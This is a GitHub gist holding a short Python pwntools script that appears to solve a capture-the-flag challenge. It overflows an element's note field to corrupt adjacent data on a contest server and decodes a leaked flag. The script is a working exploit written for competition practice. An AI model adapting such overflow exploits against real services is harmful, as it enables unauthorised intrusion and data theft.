Create a gist now

Instantly share code, notes, and snippets.

@m--- /gm.py Secret
Created Mar 17, 2015

What would you like to do?
# coding: utf-8
import os
import sys
import time
import re
import struct
import pwn
host = 'gloriousmodern.termsec.net'
port = 7000
p = lambda x: struct.pack('<Q', x)
s = pwn.remote(host, port)
print s.recvuntil('> ')
s.send('debug\n')
print s.recvuntil('> ')
# add
for i in range(0xff - 0xf8):
s.send('add %d\n' % i)
print s.recvuntil('Value for the new element\n')
s.send('AAAA\n')
print s.recvuntil('[d] Specify padding:\n')
s.send('99\n')
print s.recvuntil('Optional note for the new element:\n')
s.send('AAA' + chr(0xf8 + i) + p(0xffffffffffffffff) + '\n')
print s.recvuntil('> ')
# print
s.send('print\n')
print s.recvuntil('[d] Specify padding:\n')
s.send('02\n')
flag = ''
for match in re.findall('\d{19}', s.recv() + s.recv()):
flag += hex(int(match))[2:].decode('hex')[::-1]
print flag
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment